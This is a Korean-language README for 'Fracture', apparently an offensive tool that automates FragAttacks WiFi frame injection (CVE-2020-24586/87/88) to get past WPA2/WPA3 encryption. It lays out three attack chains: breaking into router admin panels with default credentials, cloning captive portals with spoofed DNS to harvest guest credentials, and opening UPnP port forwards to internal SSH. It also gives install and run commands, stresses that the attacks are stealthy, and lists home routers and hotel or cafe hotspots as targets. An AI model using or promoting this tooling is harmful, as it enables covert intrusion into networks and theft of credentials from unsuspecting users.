
FragAttacks WiFi 침투 프레임워크 — CVE-2020-24586/87/88
FragAttacks WiFi 침투 프레임워크
CVE-2020-24586 / CVE-2020-24587 / CVE-2020-24588
Fracture는 802.11 프레임 주입을 통해 세 가지 새로운 공격 체인을 자동화합니다. WPA2/WPA3의 A-MSDU 집계 취약점을 악용하여 비밀번호를 모르는 상태에서 암호화된 네트워크에 임의의 평문 프레임을 주입합니다.
승인된 침투 테스트 전용입니다. 소유한 네트워크 또는 명시적인 서면 허가를 받은 네트워크에서만 사용하십시오.
802.11 QoS Control의 A-MSDU present 플래그는 CCMP/GCMP 인증으로 보호되지 않습니다. 조작된 프레임에서 이 플래그를 설정하면 수신자가 페이로드를 내부 이더넷 프레임으로 해석하게 되어 암호화를 완전히 우회합니다.
Fracture는 이 프리미티브를 사용하여 세 가지 공격 경로를 구동합니다:
네트워크 외부에서 라우터의 관리 인터페이스(192.168.x.1 및 일반적인 변형)로 직접 HTTP 요청을 주입합니다. TP-Link, D-Link, Netgear, ASUS 펌웨어에서 기본 자격 증명과 알려진 인증되지 않은 CVE 엔드포인트를 시도합니다. 무음 — deauth 없음, 탐지 가능한 시그니처 없음.
캡티브 포털 네트워크를 감지하고, 포털 페이지를 복제한 후, 연결된 클라이언트를 리디렉션하기 위해 스푸핑된 DNS 응답을 주입합니다. 클라이언트가 복제본에 자격 증명을 제출하면 Fracture가 이를 캡처하여 합법적으로 인증하는 데 사용합니다. 호텔 WiFi, 기업 게스트 네트워크, 카페 핫스팟을 대상으로 합니다.
UPnP SSDP 검색 및 SOAP AddPortMapping 명령을 주입합니다. 대부분의 가정용 라우터는 이를 인증 없이 수락합니다. 성공하면 라우터의 WAN 인터페이스에 외부 포트가 열려 내부 클라이언트의 SSH로 포워딩되어 WiFi 비밀번호를 건드리지 않고도 어디서나 인바운드 액세스가 가능합니다.
sudo apt install python3-scapy python3-requests python3-bs4 python3-flask
git clone https://github.com/fracture-wifi/fracture
cd fracture
sudo pip3 install -e . --break-system-packages
설치 후 fracture는 시스템 명령어로 사용할 수 있습니다.
# 먼저 어댑터를 모니터 모드로 전환
sudo iwconfig wlan1 mode monitor
# 전체 자동 — 스캔, 대상 선택, 모든 적용 가능한 경로 실행
sudo fracture -i wlan1
# 스캔만 — 공격 없음
sudo fracture -i wlan1 --scan-only
# 특정 대상으로 고정
sudo fracture -i wlan1 -t AA:BB:CC:DD:EE:FF
# 특정 경로 강제
sudo fracture -i wlan1 --path 1 # 라우터 관리자
sudo fracture -i wlan1 --path 2 # 포털 수집
sudo fracture -i wlan1 --path 3 # UPnP
# 상세 주입 로그
sudo fracture -i wlan1 -v
# 상세 도움말
sudo fracture --about
| 대상 | 이유 |
|---|---|
| 가정용 라우터 (TP-Link, D-Link, Netgear, ASUS) | 기본 펌웨어, 기본 자격 증명, UPnP 활성화 |
| IoT 기기 | 2021년 이후 거의 패치되지 않음 |
| 캡티브 포털 네트워크 |
엔터프라이즈 장비(Cisco, Aruba, Ruckus, Ubiquiti)는 일반적으로 패치되어 있습니다.
fracture/
├── fracture/
│ ├── __init__.py # 버전, 메타데이터
│ ├── __main__.py # 진입점, 오케스트레이션
│ ├── tui.py # 터미널 UI, 색상, 테이블
│ ├── scanner.py # 채널 호핑 AP/클라이언트 검색
│ ├── injector.py # FragAttacks 프레임 엔진 (CVE-2020-24588)
│ ├── portal.py # 포털 감지, 복제, 자격 증명 서버
│ └── paths.py # 세 가지 공격 체인
├── setup.py
└── README.md
MIT
| 자격 증명 제출을 중심으로 설계된 호텔/카페 WiFi |
| Linux 커널 < 5.12.4 | 패치 이전 커널 |
| Windows 2021년 6월 이전 | 패치 이전 OS |